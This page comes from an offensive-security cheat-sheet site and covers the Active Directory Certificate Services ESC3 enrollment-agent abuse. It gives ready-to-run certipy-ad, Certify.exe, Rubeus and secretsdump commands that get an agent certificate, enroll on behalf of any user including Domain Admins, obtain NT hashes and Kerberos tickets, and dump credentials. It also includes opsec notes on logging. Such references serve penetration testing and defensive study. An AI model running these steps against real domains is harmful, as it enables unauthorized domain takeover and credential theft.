🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / ADCSESC3

ADCSESC3

ESC3: Enrollment Agent abuse β€” enroll in a Certificate Request Agent template, then use the agent certificate to enroll on behalf of any user (including Domain Admins) in a second template.

Applies to: Users/Computers with Enroll rights β†’ Certificate Request Agent template + target enrollment template β†’ Enterprise CA

Linux Abuse

certipy-ad (two-stage)

# Step 1: Find vulnerable templates
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout

# Step 2: Enroll in the Certificate Request Agent template
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<agent-template>'
# Output: <username>_agent.pfx

# Step 3: Use agent cert to enroll on behalf of target user
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<auth-template>' \
  -on-behalf-of '<domain>\<target-user>' \
  -pfx <username>_agent.pfx
# Output: <target-user>.pfx

# Step 4: Authenticate β€” get NT hash + TGT
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>

# Step 5: PTH
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'

Windows Abuse

Certify.exe + Rubeus

# Step 1: Find vulnerable templates
Certify.exe find /vulnerable

# Step 2: Enroll in the Enrollment Agent template
Certify.exe request /ca:<ca-host>\<ca> /template:<agent-template>
# Save the issued cert as agent.pfx

# Step 3: Request cert on behalf of target user using agent cert
Certify.exe request /ca:<ca-host>\<ca> /template:<auth-template> \
  /onbehalfof:<domain>\<target-user> /enrollcert:agent.pfx /enrollcertpw:<pfx-password>

# Step 4: Request TGT and inject
Rubeus.exe asktgt /user:<target-user> /domain:<domain> \
  /certificate:<pfx-base64> /password:<pfx-password> /ptt

# Verify
klist

Notes

  • Missing mail attribute: If the template requires it, set mail on the victim account or the enrollment will fail.
  • Missing dNSHostName (computer accounts): Set it on the victim computer object if the template requires it.
  • The agent certificate must have the Certificate Request Agent EKU (1.3.6.1.4.1.311.20.2.1).

Opsec

  • CA retains issued certificates in its store β€” both the agent enrollment and the on-behalf-of issuance are logged.
  • Two certificate issuance events appear; the requesting principal (attacker) and the subject (target) are both visible.